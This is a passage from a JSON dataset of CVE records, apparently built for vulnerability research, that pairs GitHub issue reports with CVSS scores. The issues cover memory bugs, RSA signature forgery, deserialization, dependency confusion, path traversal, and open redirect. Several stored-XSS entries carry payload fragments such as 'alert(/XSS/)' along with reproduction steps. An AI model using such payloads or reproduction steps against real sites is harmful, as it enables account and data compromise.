NUMBERTAG fe NUMBERTAG a1cd2ca in dlt_buffer_push PATHTAG NUMBERTAG c5cda in APITAG PATHTAG NUMBERTAG feb NUMBERTAG in APITAG char const , unsigned long) PATHTAG NUMBERTAG fe2a5 in APITAG char const , unsigned long, bool, APITAG , bool ) PATHTAG NUMBERTAG bc7 in APITAG APITAG >&) PATHTAG NUMBERTAG f NUMBERTAG in APITAG APITAG >&) PATHTAG NUMBERTAG efbee in APITAG , char , int ( )(unsigned char const , unsigned long)) PATHTAG NUMBERTAG a NUMBERTAG in main PATHTAG NUMBERTAG fe NUMBERTAG bb NUMBERTAG b2 in __libc_start_main ( PATHTAG 
NUMBERTAG de5d in _start ( PATHTAG NUMBERTAG ec NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG d in malloc PATHTAG NUMBERTAG fe NUMBERTAG a1c5f2e in dlt_buffer_increase_size PATHTAG NUMBERTAG fe NUMBERTAG a1cec2f in dlt_buffer_push3 PATHTAG NUMBERTAG fe NUMBERTAG a1cd2ca in dlt_buffer_push PATHTAG NUMBERTAG c5cda in APITAG PATHTAG NUMBERTAG feb NUMBERTAG in APITAG char const , unsigned long) PATHTAG NUMBERTAG fe2a5 in APITAG char const , unsigned long, bool, APITAG , bool ) PATHTAG NUMBERTAG bc7 in APITAG APITAG >&) PATHTAG NUMBERTAG f NUMBERTAG in APITAG APITAG >&) PATHTAG NUMBERTAG efbee in APITAG , char , int ( )(unsigned char const , unsigned long)) PATHTAG NUMBERTAG a NUMBERTAG in main PATHTAG NUMBERTAG fe NUMBERTAG bb NUMBERTAG b2 in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow PATHTAG in __asan_memcpy Shadow bytes around the buggy address NUMBERTAG c4c NUMBERTAG b NUMBERTAG c4c NUMBERTAG c NUMBERTAG c4c NUMBERTAG d NUMBERTAG c4c NUMBERTAG e NUMBERTAG c4c NUMBERTAG f NUMBERTAG c4c NUMBERTAG fa]fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c4c NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c4c NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c4c NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c4c NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c4c NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb 
Shadow gap: cc NUMBERTAG ABORTING MS NUMBERTAG base unit: APITAG artifact_prefix='./'; Test unit written to ./crash APITAG",
  60628. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  60629. "severity": "CRITICAL",
  60630. "baseScore": 9.8,
  60631. "impactScore": 5.9,
  60632. "exploitabilityScore": 3.9
  60633. },
  60634. {
  60635. "CVE_ID": "CVE-2020-36245",
  60636. "Issue_Url_old": "https://github.com/GramAddict/bot/issues/134",
  60637. "Issue_Url_new": "https://github.com/gramaddict/bot/issues/134",
  60638. "Repo_new": "gramaddict/bot",
  60639. "Issue_Created_At": "2020-12-08T10:55:40Z",
  60640. "description": "Running APITAG lets anyone on the network control/view your device! When using uiautomator2 URLTAG, which is what APITAG is based around, it silently installs the application ATX Agent URLTAG on your device, which opens a webserver on TCP port NUMBERTAG that lets anyone on the network, with ZERO authentication, execute code, install apps, download private data etc. on your device and view the screen remotely. As soon as you're running APITAG this webserver is started. This is a HUGE security concern, and should be addressed immediately! Try it yourself NUMBERTAG Find the Wi-Fi IP address of your device: APITAG (NOTE: It is trivial for anyone on the same network to discover your device and the running webserver) NUMBERTAG Run APITAG as usual NUMBERTAG Using another device on the same network, go to APITAG in your browser. This is what you're presented with: APITAG APITAG _(censored for my privacy)_ APITAG APITAG (not showing the API page, as it exposes too much personal info. You can view its endpoints and capabilities at the ATX Agent page linked above) This is extremely worrying!",
  60641. "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  60642. "severity": "HIGH",
  60643. "baseScore": 8.8,
  60644. "impactScore": 5.9,
  60645. "exploitabilityScore": 2.8
  60646. },
  60647. {
  60648. "CVE_ID": "CVE-2020-36282",
  60649. "Issue_Url_old": "https://github.com/rabbitmq/rabbitmq-jms-client/issues/135",
  60650. "Issue_Url_new": "https://github.com/rabbitmq/rabbitmq-jms-client/issues/135",
  60651. "Repo_new": "rabbitmq/rabbitmq-jms-client",
  60652. "Issue_Created_At": "2020-11-02T10:38:12Z",
  60653. "description": "Limit APITAG deserialization. APITAG should use the same \"white list\" mechanism as APITAG to avoid arbitrary code execution on deserialization. Even though APITAG is supposed to handle only primitive types, it is still possible to send a message that contains an arbitrary serializable instance. The consuming application may then execute code from this class on deserialization. The fix consists in using the list of trusted packages that can be set at the connection factory level.",
  60654. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  60655. "severity": "CRITICAL",
  60656. "baseScore": 9.8,
  60657. "impactScore": 5.9,
  60658. "exploitabilityScore": 3.9
  60659. },
  60660. {
  60661. "CVE_ID": "CVE-2020-36315",
  60662. "Issue_Url_old": "https://github.com/relic-toolkit/relic/issues/154",
  60663. "Issue_Url_new": "https://github.com/relic-toolkit/relic/issues/154",
  60664. "Repo_new": "relic-toolkit/relic",
  60665. "Issue_Created_At": "2020-06-29T14:10:21Z",
  60666. "description": "PKCS NUMBERTAG implementation and Bleichenbacher style small exponent signature forgery. Hi there, As I was testing the PKCS NUMBERTAG implementation inside RELIC, it appears to me that it might be susceptible to a Bleichenbacher style small exponent signature forgery. In a nut shell, there are mainly NUMBERTAG issues in the code (both in APITAG ) that enables the attack NUMBERTAG The checks on the first NUMBERTAG bytes to see whether they are indeed APITAG actually doesn't lead to rejection of malformed inputs. Although line NUMBERTAG URLTAG and line NUMBERTAG URLTAG will set APITAG if the prefix bytes do not match the expectation, the result variable is never checked later and will get overwritten on line NUMBERTAG URLTAG , hence the first NUMBERTAG bytes can take any arbitrary values and the signature verification will still go through NUMBERTAG More importantly, the APITAG loop on line NUMBERTAG URLTAG only checks that the padding has not been terminated with a zero, but it doesn't actually require the each of the padding bytes to be APITAG , and because of this, the padding can take arbitrary non zero values and the signature verification will still go through. Together, this opens up the possibility of a Bleichenbacher style small exponent signature forgery. Here is a proof of concept forgery attack, based on the APITAG given in the source tree: ERRORTAG For convenience I used a somewhat unconventional sized NUMBERTAG bit long) modulus. I used APITAG to generate it, but you can try it with a different NUMBERTAG bit long modulus and the forged signature should still work. The forgery algorithm should also work against \"regular\" sized (e.g NUMBERTAG bit and NUMBERTAG bit long) moduli, though I have yet to have a chance to work on that, and I think the above proof of concept already serves the purpose. 
Such a forgery should only work when e is small enough (which in most cases means APITAG ), and although RELIC by default doesn't generate RSA keys with APITAG , there is a possibility that someone might use APITAG for specific application & interoperability needs, and nothing in the API prohibits the programmer from doing so. In any case, unless the plan is to completely drop support for PKCS NUMBERTAG, I'd suggest fixing the issues in APITAG, as it is definitely possible (and not really that difficult) to make the signature verification much more robust. More details on the Bleichenbacher-style signature forgery can be found in academic papers like FILETAG and FILETAG. Finally, though it shouldn't matter much, this is the script I used ( APITAG ) to configure the build: CODETAG",
  60667. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  60668. "severity": "MEDIUM",
  60669. "baseScore": 5.3,
  60670. "impactScore": 1.4,
  60671. "exploitabilityScore": 3.9
  60672. },
  60673. {
  60674. "CVE_ID": "CVE-2020-36316",
  60675. "Issue_Url_old": "https://github.com/relic-toolkit/relic/issues/155",
  60676. "Issue_Url_new": "https://github.com/relic-toolkit/relic/issues/155",
  60677. "Repo_new": "relic-toolkit/relic",
  60678. "Issue_Created_At": "2020-06-29T14:31:53Z",
  60679. "description": "Buffer overflow in PKCS NUMBERTAG signature verification. Besides the problems mentioned in NUMBERTAG, there seem to be additional problems in the PKCS NUMBERTAG signature verification code that can lead to a buffer overflow. Although the variable APITAG is set according to prior knowledge on line NUMBERTAG URLTAG, it is actually overwritten on line NUMBERTAG URLTAG by the call to APITAG. And because APITAG doesn't require that the padding is (NUMBERTAG) at least NUMBERTAG bytes long, or (NUMBERTAG) long enough that there are no extra trailing bytes after the hash value, the value of APITAG can be set to a really small number when given a malformed signature with very short padding. Then on line NUMBERTAG URLTAG it is possible for APITAG to become a really large value, larger than the size of APITAG allocated on line NUMBERTAG URLTAG, which can lead to a buffer overflow. Similar problems of not requiring padding of the appropriate length were found in other implementations before, and that can usually be exploited for signature forgery (like in Bleichenbacher's original attack URLTAG). However, in this case it induces a buffer overflow instead, because of how APITAG was used to calculate the size of a subsequent buffer write (though I suspect the variable result might be set to APITAG after line NUMBERTAG URLTAG). Here's proof of concept code demonstrating the problem, which should give a Segmentation Fault upon completion of the signature verification: ERRORTAG",
  60680. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  60681. "severity": "MEDIUM",
  60682. "baseScore": 5.5,
  60683. "impactScore": 3.6,
  60684. "exploitabilityScore": 1.8
  60685. },
  60686. {
  60687. "CVE_ID": "CVE-2020-36317",
  60688. "Issue_Url_old": "https://github.com/rust-lang/rust/issues/78498",
  60689. "Issue_Url_new": "https://github.com/rust-lang/rust/issues/78498",
  60690. "Repo_new": "rust-lang/rust",
  60691. "Issue_Created_At": "2020-10-28T19:14:36Z",
  60692. "description": "String::retain allows safely creating invalid (non-UTF-8) strings when abusing panic. While APITAG executes it may temporarily leave the String in an inconsistent state; in particular it may contain invalid UTF-8. This is sound only because it restores the invariant before returning, but the caller can skip that restoration by panicking inside the closure and catching the unwind outside. This allows creating String values that are not UTF-8, breaking the library invariant without using ERRORTAG. For example the following will panic at the final assertion, while I would expect it to never fail when s has type String: ERRORTAG",
  60693. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  60694. "severity": "HIGH",
  60695. "baseScore": 7.5,
  60696. "impactScore": 3.6,
  60697. "exploitabilityScore": 3.9
  60698. },
  60699. {
  60700. "CVE_ID": "CVE-2020-36318",
  60701. "Issue_Url_old": "https://github.com/rust-lang/rust/issues/79808",
  60702. "Issue_Url_new": "https://github.com/rust-lang/rust/issues/79808",
  60703. "Repo_new": "rust-lang/rust",
  60704. "Issue_Created_At": "2020-12-07T21:12:10Z",
  60705. "description": "APITAG length NUMBERTAG underflow and bogus values from APITAG triggered by a certain sequence of APITAG APITAG APITAG APITAG APITAG This is my first bug report, so please correct me s if I miss anything : ) I use APITAG in a toy application ( URLTAG which is handling external reads in a loop, and does possible partial handling of the input. My pattern is I call reserve(N) before APITAG N times, then APITAG then doing some APITAG I noticed the app was behaving badly, and was able to generate a stand alone test case which shows the bug. The code is pretty boring and repetitive, so I put it at URLTAG to avoid spamming here. Just issue \"cargo run\" after cloning out that code, and look for the word \"BUG\" within the terminal output: According to the docs, APITAG on an empty APITAG should return None. Instead, this happens: CODETAG If I set the boolean \"do_reserve\" to be false, thus getting rid of all the APITAG calls, I get the expected behavior: CODETAG The same happens if I set \"do_make_contiguous\" to false as well so calling both I found this on Meta APITAG The below is the version I found it in, but thanks Steve Klabnik for also testing it on nightly and getting the same output. APITAG : ERRORTAG",
  60706. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  60707. "severity": "CRITICAL",
  60708. "baseScore": 9.8,
  60709. "impactScore": 5.9,
  60710. "exploitabilityScore": 3.9
  60711. },
  60712. {
  60713. "CVE_ID": "CVE-2020-36323",
  60714. "Issue_Url_old": "https://github.com/rust-lang/rust/issues/80335",
  60715. "Issue_Url_new": "https://github.com/rust-lang/rust/issues/80335",
  60716. "Repo_new": "rust-lang/rust",
  60717. "Issue_Created_At": "2020-12-23T16:44:23Z",
  60718. "description": "API soundness issue in APITAG implementation of Borrow APITAG ]. A weird Borrow implementation that returns a different result for each call can create a string with uninitialized bytes with APITAG URLTAG implementation of APITAG type. The problem is in APITAG URLTAG function NUMBERTAG The borrow result is first used for the length calculation. URLTAG NUMBERTAG Then, inside APITAG macro, the user provided slice is borrowed again and the content is copied. URLTAG NUMBERTAG Finally, the length of the slice is set to the length calculated in step NUMBERTAG URLTAG Playground link URLTAG , which demonstrates creating a non UTF NUMBERTAG string by only using safe Rust.",
  60719. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H",
  60720. "severity": "HIGH",
  60721. "baseScore": 8.2,
  60722. "impactScore": 4.2,
  60723. "exploitabilityScore": 3.9
  60724. },
  60725. {
  60726. "CVE_ID": "CVE-2020-36325",
  60727. "Issue_Url_old": "https://github.com/akheron/jansson/issues/548",
  60728. "Issue_Url_new": "https://github.com/akheron/jansson/issues/548",
  60729. "Repo_new": "akheron/jansson",
  60730. "Issue_Created_At": "2020-09-01T16:46:51Z",
  60731. "description": "OOB Read memory corruption bug. Hi, I encountered an OOB read memory corruption bug when fuzzing Jansson. Below you can find the crash log: ./prog detect_leaks NUMBERTAG INFO: Seed NUMBERTAG INFO: Loaded NUMBERTAG modules NUMBERTAG inline NUMBERTAG bit counters NUMBERTAG a3f NUMBERTAG a3f9a), INFO: Loaded NUMBERTAG PC tables NUMBERTAG PCs NUMBERTAG c0), INFO: max_len is not provided; APITAG will not generate inputs larger than NUMBERTAG bytes INFO: A corpus is not provided, starting from an empty corpus NUMBERTAG INITED co NUMBERTAG ft NUMBERTAG corp NUMBERTAG b exec/s NUMBERTAG rss NUMBERTAG Mb NUMBERTAG NEW co NUMBERTAG ft NUMBERTAG corp NUMBERTAG b lim NUMBERTAG exec/s NUMBERTAG rss NUMBERTAG Mb L NUMBERTAG MS NUMBERTAG APITAG APITAG APITAG APITAG NUMBERTAG REDUCE co NUMBERTAG ft NUMBERTAG corp NUMBERTAG b lim NUMBERTAG exec/s NUMBERTAG rss NUMBERTAG Mb L NUMBERTAG MS NUMBERTAG APITAG NUMBERTAG pulse co NUMBERTAG ft NUMBERTAG corp NUMBERTAG b lim NUMBERTAG exec/s NUMBERTAG rss NUMBERTAG Mb NUMBERTAG pulse co NUMBERTAG ft NUMBERTAG corp NUMBERTAG b lim NUMBERTAG exec/s NUMBERTAG rss NUMBERTAG Mb NUMBERTAG pulse co NUMBERTAG ft NUMBERTAG corp NUMBERTAG b lim NUMBERTAG exec/s NUMBERTAG rss NUMBERTAG Mb NUMBERTAG pulse co NUMBERTAG ft NUMBERTAG corp NUMBERTAG b lim NUMBERTAG exec/s NUMBERTAG rss NUMBERTAG Mb NUMBERTAG pulse co NUMBERTAG ft NUMBERTAG corp NUMBERTAG b lim NUMBERTAG exec/s NUMBERTAG rss NUMBERTAG Mb NUMBERTAG pulse co NUMBERTAG ft NUMBERTAG corp NUMBERTAG b lim NUMBERTAG exec/s NUMBERTAG rss NUMBERTAG Mb NUMBERTAG pulse co NUMBERTAG ft NUMBERTAG corp NUMBERTAG b lim NUMBERTAG exec/s NUMBERTAG rss NUMBERTAG Mb NUMBERTAG pulse co NUMBERTAG ft NUMBERTAG corp NUMBERTAG b lim NUMBERTAG exec/s NUMBERTAG rss NUMBERTAG Mb NUMBERTAG pulse co NUMBERTAG ft NUMBERTAG corp NUMBERTAG b lim NUMBERTAG exec/s NUMBERTAG rss NUMBERTAG Mb APITAG APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG f NUMBERTAG f4f NUMBERTAG 
b bp NUMBERTAG ffcf NUMBERTAG a NUMBERTAG sp NUMBERTAG ffcf NUMBERTAG T0) APITAG signal is caused by a READ memory access NUMBERTAG f NUMBERTAG f4f NUMBERTAG b in string_get PATHTAG NUMBERTAG f NUMBERTAG f4f NUMBERTAG f3 in APITAG PATHTAG NUMBERTAG f NUMBERTAG f4f NUMBERTAG in stream_get PATHTAG NUMBERTAG f NUMBERTAG f4f NUMBERTAG in lex_get_save PATHTAG NUMBERTAG f NUMBERTAG f4f0a NUMBERTAG in lex_scan PATHTAG NUMBERTAG f NUMBERTAG f4f NUMBERTAG da in APITAG PATHTAG NUMBERTAG f NUMBERTAG f4f NUMBERTAG in json_loads PATHTAG NUMBERTAG dad3 in APITAG PATHTAG NUMBERTAG a1 in APITAG char const , unsigned long) ( PATHTAG NUMBERTAG de5 in APITAG char const , unsigned long, bool, APITAG , bool ) ( PATHTAG NUMBERTAG a NUMBERTAG in APITAG ( PATHTAG NUMBERTAG ad NUMBERTAG in APITAG APITAG >&) ( PATHTAG NUMBERTAG e in APITAG , char , int ( )(unsigned char const , unsigned long)) ( PATHTAG NUMBERTAG in main ( PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG b2 in __libc_start_main PATHTAG NUMBERTAG e4dd in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG in string_get NUMBERTAG ABORTING MS NUMBERTAG APITAG APITAG ; base unit: APITAG APITAG APITAG APITAG APITAG APITAG APITAG artifact_prefix='./'; Test unit written to ./crash APITAG Base NUMBERTAG APITAG APITAG The fuzzer I used was: include APITAG include APITAG int APITAG char Data, size_t Size) { FILE APITAG APITAG = fopen( PATHTAG \"w\"); json_t root; json_error_t error; root = APITAG NUMBERTAG error); json_dumpf(root, APITAG NUMBERTAG json_decref(root); APITAG return NUMBERTAG Kind Regards, Jordy Zomer",
  60732. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  60733. "severity": "HIGH",
  60734. "baseScore": 7.5,
  60735. "impactScore": 3.6,
  60736. "exploitabilityScore": 3.9
  60737. },
  60738. {
  60739. "CVE_ID": "CVE-2020-36327",
  60740. "Issue_Url_old": "https://github.com/rubygems/rubygems/issues/3982",
  60741. "Issue_Url_new": "https://github.com/rubygems/rubygems/issues/3982",
  60742. "Repo_new": "rubygems/rubygems",
  60743. "Issue_Created_At": "2020-09-30T18:25:40Z",
  60744. "description": "Global vs block rubygems source priority doesn't work as expected. In a situation like the following: CODETAG Bundler should try to resolve using the private source for my private gem and all of its indirect dependencies. Only if no valid resolution is found should it also consider APITAG for those dependencies. Instead, Bundler will still install APITAG from rubygems.org if a gem with that name exists there, which means anyone able to publish that name to the public source can get their code installed in place of the private dependency (a dependency-confusion scenario). We should probably search first in the same source as APITAG before falling back. APITAG posted by MENTIONTAG in URLTAG",
  60745. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  60746. "severity": "HIGH",
  60747. "baseScore": 8.8,
  60748. "impactScore": 5.9,
  60749. "exploitabilityScore": 2.8
  60750. },
  60751. {
  60752. "CVE_ID": "CVE-2020-36364",
  60753. "Issue_Url_old": "https://github.com/smartstore/SmartStoreNET/issues/2112",
  60754. "Issue_Url_new": "https://github.com/smartstore/smartstorenet/issues/2112",
  60755. "Repo_new": "smartstore/smartstorenet",
  60756. "Issue_Created_At": "2020-10-08T12:36:16Z",
  60757. "description": "Path Traversal Vulnerability. Hello, thanks for maintaining this open source project. I would like to report a path traversal vulnerability similar to: URLTAG URLTAG In the APITAG URLTAG method, the user-controlled APITAG input is not validated, so an attacker can perform a path traversal attack to copy an arbitrary file into a new profile and delete the original file URLTAG . The value should be canonicalized and checked against the intended base directory (or reduced to a bare file name) before it is used in any file operation. FILETAG Eric",
  60758. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  60759. "severity": "CRITICAL",
  60760. "baseScore": 9.1,
  60761. "impactScore": 5.2,
  60762. "exploitabilityScore": 3.9
  60763. },
  60764. {
  60765. "CVE_ID": "CVE-2020-36365",
  60766. "Issue_Url_old": "https://github.com/smartstore/SmartStoreNET/issues/2113",
  60767. "Issue_Url_new": "https://github.com/smartstore/smartstorenet/issues/2113",
  60768. "Repo_new": "smartstore/smartstorenet",
  60769. "Issue_Created_At": "2020-10-08T15:05:56Z",
  60770. "description": "Open redirect vulnerability in APITAG method. Hello, this issue addresses an open redirect vulnerability in the APITAG URLTAG method: a redirect target supplied by the request is not restricted to local URLs, so a crafted link can send the user to an attacker-controlled site. Example: FILETAG Eric",
  60771. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  60772. "severity": "MEDIUM",
  60773. "baseScore": 6.1,
  60774. "impactScore": 2.7,
  60775. "exploitabilityScore": 2.8
  60776. },
  60777. {
  60778. "CVE_ID": "CVE-2020-36367",
  60779. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/135",
  60780. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/135",
  60781. "Repo_new": "cesanta/mjs",
  60782. "Issue_Created_At": "2019-05-28T07:23:36Z",
  60783. "description": "APITAG stack overflow on recursive stack frames: parse_block, parse_statement, parse_statement_list. An issue was discovered in mjs.c NUMBERTAG . Stack exhaustion occurs in the mjs_mk_string function; the stack consumption is caused by recursive stack frames (presumably unbounded recursion through parse_block, parse_statement and parse_statement_list on deeply nested input, which a nesting-depth limit in the parser would bound). POC: FILETAG ASAN output: ERRORTAG",
  60784. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  60785. "severity": "MEDIUM",
  60786. "baseScore": 5.5,
  60787. "impactScore": 3.6,
  60788. "exploitabilityScore": 1.8
  60789. },
  60790. {
  60791. "CVE_ID": "CVE-2020-36370",
  60792. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/136",
  60793. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/136",
  60794. "Repo_new": "cesanta/mjs",
  60795. "Issue_Created_At": "2019-05-28T07:28:05Z",
  60796. "description": "APITAG stack overflow on recursive stack frames: parse_unary, parse_mul_div_rem, parse_plus_minus.... POC: FILETAG ERRORTAG",
  60797. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  60798. "severity": "MEDIUM",
  60799. "baseScore": 5.5,
  60800. "impactScore": 3.6,
  60801. "exploitabilityScore": 1.8
  60802. },
  60803. {
  60804. "CVE_ID": "CVE-2020-36395",
  60805. "Issue_Url_old": "https://github.com/LavaLite/cms/issues/321",
  60806. "Issue_Url_new": "https://github.com/lavalite/cms/issues/321",
  60807. "Repo_new": "lavalite/cms",
  60808. "Issue_Created_At": "2020-05-25T07:39:18Z",
  60809. "description": "Cross Site Scripting Vulnerability on APITAG feature in Lavelite. Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the \"security\" feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Click APITAG NUMBERTAG Insert payload: FILETAG APITAG APITAG load=alert(/XSS/)// APITAG // \"> APITAG NUMBERTAG Click APITAG NUMBERTAG iew the preview to trigger XSS NUMBERTAG iew the preview to get in request and such Stored XSS Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page. Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots FILETAG Desktop (please complete the following information): OS: Windows Browser: Firefox Version NUMBERTAG",
  60810. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  60811. "severity": "MEDIUM",
  60812. "baseScore": 5.4,
  60813. "impactScore": 2.7,
  60814. "exploitabilityScore": 2.3
  60815. },
  60816. {
  60817. "CVE_ID": "CVE-2020-36396",
  60818. "Issue_Url_old": "https://github.com/LavaLite/cms/issues/322",
  60819. "Issue_Url_new": "https://github.com/lavalite/cms/issues/322",
  60820. "Repo_new": "lavalite/cms",
  60821. "Issue_Created_At": "2020-05-25T07:50:11Z",
  60822. "description": "Cross Site Scripting Vulnerability on APITAG & Permissions\" feature in Lavelite..",
  60823. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  60824. "severity": "MEDIUM",
  60825. "baseScore": 5.4,
  60826. "impactScore": 2.7,
  60827. "exploitabilityScore": 2.3
  60828. },
  60829. {
  60830. "CVE_ID": "CVE-2020-36397",
  60831. "Issue_Url_old": "https://github.com/LavaLite/cms/issues/323",
  60832. "Issue_Url_new": "https://github.com/lavalite/cms/issues/323",
  60833. "Repo_new": "lavalite/cms",
  60834. "Issue_Created_At": "2020-05-25T09:06:23Z",
  60835. "description": "Cross Site Scripting Vulnerability on APITAG feature in Lavelite.. Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Click APITAG Insert payload: FILETAG APITAG APITAG load=alert('XSS')// APITAG // \"> APITAG NUMBERTAG Click APITAG NUMBERTAG iew the preview to trigger XSS NUMBERTAG iew the preview to get in request and such Stored XSS Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page. Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots FILETAG FILETAG Desktop (please complete the following information): OS: Windows Browser: Firefox Version NUMBERTAG",
  60836. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  60837. "severity": "MEDIUM",
  60838. "baseScore": 5.4,
  60839. "impactScore": 2.7,
  60840. "exploitabilityScore": 2.3
  60841. },
  60842. {
  60843. "CVE_ID": "CVE-2020-36398",
  60844. "Issue_Url_old": "https://github.com/phpList/phplist3/issues/676",
  60845. "Issue_Url_new": "https://github.com/phplist/phplist3/issues/676",
  60846. "Repo_new": "phplist/phplist3",
  60847. "Issue_Created_At": "2020-06-05T11:40:45Z",
  60848. "description": "Cross Site Scripting Vulnerability on APITAG a campaign\" feature in APITAG NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG a campaign\" feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Insert payload: FILETAG // \"> APITAG \"> APITAG NUMBERTAG Click APITAG and continue editing NUMBERTAG iew the preview to trigger XSS NUMBERTAG iew the preview to get in request and such Stored XSS. Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is stored back to the page. Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots FILETAG FILETAG Insert payload FILETAG Trigger XSS FILETAG FILETAG FILETAG Desktop (please complete the following information): OS: Ubuntu Browser: Firefox Version NUMBERTAG",
  60849. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  60850. "severity": "MEDIUM",
  60851. "baseScore": 5.4,
  60852. "impactScore": 2.7,
  60853. "exploitabilityScore": 2.3
  60854. },
  60855. {
  60856. "CVE_ID": "CVE-2020-36399",
  60857. "Issue_Url_old": "https://github.com/phpList/phplist3/issues/675",
  60858. "Issue_Url_new": "https://github.com/phplist/phplist3/issues/675",
  60859. "Repo_new": "phplist/phplist3",
  60860. "Issue_Created_At": "2020-06-05T01:57:55Z",
  60861. "description": "Cross Site Scripting Vulnerability on APITAG rules\" feature in APITAG NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG administrators\" feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the panel NUMBERTAG Go to \" URLTAG NUMBERTAG Click \"rule1\" to edit the rule information NUMBERTAG Insert payload: ' APITAG NUMBERTAG Click APITAG Changes NUMBERTAG View the preview to trigger the XSS NUMBERTAG View the preview to see the request and the stored XSS. Expected behavior Removing script tags is not sufficient to prevent an XSS attack; attribute breakouts and event handlers still execute. You must HTML-entity encode any output that is rendered back into the page, using the encoding appropriate for the output context (HTML body, attribute, JavaScript). Impact Commonly includes transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots FILETAG Insert payload FILETAG Trigger XSS FILETAG FILETAG Desktop (please complete the following information): OS: Ubuntu Browser: Firefox Version NUMBERTAG",
  60862. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  60863. "severity": "MEDIUM",
  60864. "baseScore": 5.4,
  60865. "impactScore": 2.7,
  60866. "exploitabilityScore": 2.3
  60867. },
  60868. {
  60869. "CVE_ID": "CVE-2020-36421",
  60870. "Issue_Url_old": "https://github.com/ARMmbed/mbedtls/issues/3394",
  60871. "Issue_Url_new": "https://github.com/mbed-tls/mbedtls/issues/3394",
  60872. "Repo_new": "mbed-tls/mbedtls",
  60873. "Issue_Created_At": "2020-06-04T10:32:00Z",
